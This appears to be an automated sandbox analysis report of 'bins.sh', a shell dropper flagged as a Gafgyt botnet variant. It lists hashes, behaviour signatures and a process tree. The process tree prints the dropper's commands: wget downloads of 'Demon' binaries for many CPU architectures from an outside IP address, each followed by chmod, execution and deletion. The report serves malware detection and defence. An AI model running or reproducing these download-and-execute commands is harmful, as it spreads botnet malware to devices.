Analysis
- max time kernel: 22s
- max time network: 23s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240418-en
- resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 19-10-2024 11:41
Static task
- static1

Behavioral tasks (sample: bins.sh)
- behavioral1: resource debian12-armhf-20240418-en
- behavioral2: resource debian12-mipsel-20240729-en
- behavioral3: resource debian9-armhf-20240611-en
- behavioral4: resource debian9-mipsbe-20240418-en
- behavioral5: resource debian9-mipsel-20240611-en
- behavioral6: resource ubuntu1804-amd64-20240611-en
- behavioral7: resource ubuntu2004-amd64-20240611-en
- behavioral8: resource ubuntu2204-amd64-20240611-en
- behavioral9: resource ubuntu2404-amd64-20240523-en
General
- Target: bins.sh
- Size: 2KB
- MD5: a754f4cf9d6ba2d574cd90bf04d1bc35
- SHA1: b0191e89c26057b6132f3314fa685e1879c7dc62
- SHA256: bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
- SHA512: 600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config

Signatures
- Detected Gafgyt variant (1 IoC)
  Processes (yara_rule): /tmp/Demon.mips matched family_gafgyt
- File and Directory Permissions Modification (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 751 chmod, 762 chmod, 767 chmod, 777 chmod, 786 chmod, 800 chmod, 812 chmod, 852 chmod, 857 chmod, 828 chmod, 846 chmod, 862 chmod, 867 chmod, 772 chmod
- Executes dropped EXE (1 IoC)
  Processes (ioc, pid, process): /tmp/Demon.mips, 753, Demon.mips
- Reads system routing table (1 TTP, 1 IoC)
  Gets active network interfaces from /proc virtual filesystem.
  Processes (description, ioc, process): File opened for reading, /proc/net/route, Demon.mips
- Changes its process name (1 IoC)
  Processes (description, pid, process): Changes the process name, possibly in an attempt to hide itself, 753, Demon.mips
- Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of /proc filesystem to enumerate network settings.
  Processes (description, ioc, process): File opened for reading, /proc/net/route, Demon.mips
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process): 731 wget, 753 Demon.mips, 756 rm
- Writes file to tmp directory (13 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description: File opened for modification; process: wget): /tmp/Demon.x86, /tmp/Demon.i686, /tmp/Demon.mips, /tmp/Demon.mpsl, /tmp/Demon.sh4, /tmp/Demon.m68k, /tmp/Demon.sparc, /tmp/Demon.arm4, /tmp/Demon.arm5, /tmp/Demon.arm7, /tmp/Demon.arm6, /tmp/Demon.ppc, /tmp/Demon.i586
Processes
- PID 728  /tmp/bins.sh: /tmp/bins.sh
  - PID 731  /usr/bin/wget: wget http://38.123.149.216/Demon.mips  [System Network Configuration Discovery; Writes file to tmp directory]
  - PID 751  /bin/chmod: chmod +x Demon.mips  [File and Directory Permissions Modification]
  - PID 753  /tmp/Demon.mips: ./Demon.mips  [Executes dropped EXE; Reads system routing table; Changes its process name; Reads system network configuration; System Network Configuration Discovery]
  - PID 756  /bin/rm: rm -rf Demon.mips  [System Network Configuration Discovery]
  - PID 758  /usr/bin/wget: wget http://38.123.149.216/Demon.mpsl  [Writes file to tmp directory]
  - PID 762  /bin/chmod: chmod +x Demon.mpsl  [File and Directory Permissions Modification]
  - PID 763  /tmp/Demon.mpsl: ./Demon.mpsl
  - PID 765  /bin/rm: rm -rf Demon.mpsl
  - PID 766  /usr/bin/wget: wget http://38.123.149.216/Demon.sh4  [Writes file to tmp directory]
  - PID 767  /bin/chmod: chmod +x Demon.sh4  [File and Directory Permissions Modification]
  - PID 768  /tmp/Demon.sh4: ./Demon.sh4
  - PID 770  /bin/rm: rm -rf Demon.sh4
  - PID 771  /usr/bin/wget: wget http://38.123.149.216/Demon.x86  [Writes file to tmp directory]
  - PID 772  /bin/chmod: chmod +x Demon.x86  [File and Directory Permissions Modification]
  - PID 773  /tmp/Demon.x86: ./Demon.x86
  - PID 775  /bin/rm: rm -rf Demon.x86
  - PID 776  /usr/bin/wget: wget http://38.123.149.216/Demon.arm6  [Writes file to tmp directory]
  - PID 777  /bin/chmod: chmod +x Demon.arm6  [File and Directory Permissions Modification]
  - PID 778  /tmp/Demon.arm6: ./Demon.arm6
  - PID 780  /bin/rm: rm -rf Demon.arm6
  - PID 781  /usr/bin/wget: wget http://38.123.149.216/Demon.i686  [Writes file to tmp directory]
  - PID 786  /bin/chmod: chmod +x Demon.i686  [File and Directory Permissions Modification]
  - PID 787  /tmp/Demon.i686: ./Demon.i686
  - PID 790  /bin/rm: rm -rf Demon.i686
  - PID 792  /usr/bin/wget: wget http://38.123.149.216/Demon.ppc  [Writes file to tmp directory]
  - PID 800  /bin/chmod: chmod +x Demon.ppc  [File and Directory Permissions Modification]
  - PID 801  /tmp/Demon.ppc: ./Demon.ppc
  - PID 804  /bin/rm: rm -rf Demon.ppc
  - PID 805  /usr/bin/wget: wget http://38.123.149.216/Demon.i586  [Writes file to tmp directory]
  - PID 812  /bin/chmod: chmod +x Demon.i586  [File and Directory Permissions Modification]
  - PID 814  /tmp/Demon.i586: ./Demon.i586
  - PID 817  /bin/rm: rm -rf Demon.i586
  - PID 818  /usr/bin/wget: wget http://38.123.149.216/Demon.m68k  [Writes file to tmp directory]
  - PID 828  /bin/chmod: chmod +x Demon.m68k  [File and Directory Permissions Modification]
  - PID 830  /tmp/Demon.m68k: ./Demon.m68k
  - PID 833  /bin/rm: rm -rf Demon.m68k
  - PID 835  /usr/bin/wget: wget http://38.123.149.216/Demon.sparc  [Writes file to tmp directory]
  - PID 846  /bin/chmod: chmod +x Demon.sparc  [File and Directory Permissions Modification]
  - PID 847  /tmp/Demon.sparc: ./Demon.sparc
  - PID 849  /bin/rm: rm -rf Demon.sparc
  - PID 851  /usr/bin/wget: wget http://38.123.149.216/Demon.arm4  [Writes file to tmp directory]
  - PID 852  /bin/chmod: chmod +x Demon.arm4  [File and Directory Permissions Modification]
  - PID 853  /tmp/Demon.arm4: ./Demon.arm4
  - PID 855  /bin/rm: rm -rf Demon.arm4
  - PID 856  /usr/bin/wget: wget http://38.123.149.216/Demon.arm5  [Writes file to tmp directory]
  - PID 857  /bin/chmod: chmod +x Demon.arm5  [File and Directory Permissions Modification]
  - PID 858  /tmp/Demon.arm5: ./Demon.arm5
  - PID 860  /bin/rm: rm -rf Demon.arm5
  - PID 861  /usr/bin/wget: wget http://38.123.149.216/Demon.arm7  [Writes file to tmp directory]
  - PID 862  /bin/chmod: chmod +x Demon.arm7  [File and Directory Permissions Modification]
  - PID 863  /tmp/Demon.arm7: ./Demon.arm7
  - PID 865  /bin/rm: rm -rf Demon.arm7
  - PID 866  /usr/bin/wget: wget http://38.123.149.216/Demon.ppc440fp
  - PID 867  /bin/chmod: chmod +x Demon.ppc440fp  [File and Directory Permissions Modification]
  - PID 868  /tmp/Demon.ppc440fp: ./Demon.ppc440fp
  - PID 869  /bin/rm: rm -rf Demon.ppc440fp
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 211KB
- MD5: 455a2acf75de8da6ab7c4d9564cc69f9
- SHA1: 9e6016c6581289e685bcd6392bbf0bcf6b1182ff
- SHA256: b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
- SHA512: a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab